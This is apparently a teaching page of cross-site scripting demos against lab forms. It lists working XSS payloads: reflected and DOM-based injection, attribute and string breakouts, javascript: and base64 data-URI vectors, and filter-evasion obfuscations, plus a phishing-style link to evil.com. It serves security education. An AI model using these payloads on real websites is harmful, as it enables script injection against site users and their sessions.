Sam Bowne

XSS Demos

1. Reflected XSS

Message:

Pop up a box

Solution

<script>alert("Reflected XSS Vulnerability!");</script>

Another Payload

Error: please go to our <a href='http://evil.com'>our new page;</a>
Note: XSS Auditor stops this attack in Chrome and Safari on the Mac, and something blocks it in Opera. It works in Firefox.

2. More Reflected XSS Demos

3. Stored XSS Demos

4. DOM-Based XSS Demos

https://attack.samsclass.info/xss4.htm?message=hi

https://attack.samsclass.info/xss4.htm?message=<script>alert('Hi')</script>

5. Tag Attribute Value

Image Resizer

Height:
Width:

Solutions

50%'><script>alert(1)</script>

50%' onclick='alert(1)

6. JavaScript String

Variable a:

Solutions

'; alert(1); var b='

7. URL

URL:

Solutions

javascript:alert(1);

http://www.ccsf.edu' onclick='javascript:alert(1)

8. Blocking SCRIPT Tags

Message:

Solutions

Third one works in Chrome!
<object data="data:text/html,<script>alert(1)</script>">

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click here</a>

9. Obfuscation

Message:

Examples

<script>alert(1);</script>

<xml onreadystatechange=alert(1)>

<input autofocus onfocus=alert(1)>

<x onclick=alert(1) src=a>Click here</x>

<script/anyjunk>alert(1);</script>

<img/onerror="alert(1)"src=a>

<img/anyjunk/onerror="alert(1)"src=a>

<<script>alert(1);<</script>

<script<{alert(1)}/></script>

<script>a\u006cert(1);</script>

<script>a\l\ert\(1\);</script>

<img onerror=eval('al\u0065rt(1)') src=a>

10. eval

Source Code

<p id="demo">alert(1)</p>
<p>
<button onclick="myFunction()">Try it</button>
<p>
<script>
function myFunction() {
    var str = document.getElementById("demo").innerHTML; 
    var res = str.replace(/.*/, eval);
    document.getElementById("demo").innerHTML = res;
}
</script>

Live Code

alert(1)


Last modified: 4-16-2020